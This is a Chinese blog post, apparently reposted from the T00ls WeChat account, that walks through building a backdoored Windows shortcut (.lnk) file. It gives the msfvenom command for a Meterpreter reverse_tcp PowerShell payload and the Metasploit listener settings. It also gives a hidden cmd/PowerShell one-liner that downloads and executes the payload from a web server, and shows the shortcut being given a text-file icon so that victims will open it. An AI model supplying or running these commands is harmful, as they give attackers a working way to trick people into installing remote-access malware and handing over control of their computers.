Lnk快捷方式复现小技巧

  • A+
所属分类:安全文章

Lnk快捷方式复现小技巧


0X00

其实这些东西也没什么好稀奇的,很多大牛都已经事先复现成功了,但是我也想来造一个轮子!Lnk快捷方式复现小技巧 

0X01

主要就是在复现的基础上加上一些以前自己玩badusb的小技巧

0X02

我们首先用MSF生成一个payload:

Lnk快捷方式复现小技巧

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=你的IP LPORT=端口 -f psh-reflection >ww.ps1

(我这边是用的外网的kali所以在Xshell里面执行的)

现在用sz ww.ps1命令把生成的payload下载到本机电脑

然后将ww.ps1上传到你自己的web目录下!

这边设置msf监听payload

Lnk快捷方式复现小技巧

1:use exploit/multi/handler  (执行MSF的监听模块)

2set payload windows/meterpreter/reverse_tcp  (设置监听payload)

3set LHOST IP

4set LPORT 端口

5set exitonsession false  (开启后台监听)

6:exploit -j  (开始监听)

0X02

这边我们就来制作我们的lnk后门程序了!

Lnk快捷方式复现小技巧

cmd.exe /c start /min powershell -w hidden ""IEX (New-Object Net.WebClient).DownloadString('http://www.xxxx.com/ww.ps1'); ""

这段代码的意思是以cmd执行powershell远程下载并执行我web目录下的ww.ps1文件!其中/c start /min powershell -w hidden主要作用就是为了隐藏powershell那个蓝色的框

Lnk快捷方式复现小技巧



这样的东西你发给谁他都不会打开的!

Lnk快捷方式复现小技巧



Lnk快捷方式复现小技巧



在这里你随便输入个字母然后回车就会出现很多图标给你更换

Lnk快捷方式复现小技巧



我们换个系统文本的图标

Lnk快捷方式复现小技巧



然后我们双击运行

Lnk快捷方式复现小技巧



这边已经成功反弹回来了

0X04

只是造个轮子,很多地方还比不上大佬些,各种奇淫技巧还需要大佬们支招!Lnk快捷方式复现小技巧 


Lnk快捷方式复现小技巧

本文始发于微信公众号(T00ls):Lnk快捷方式复现小技巧

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: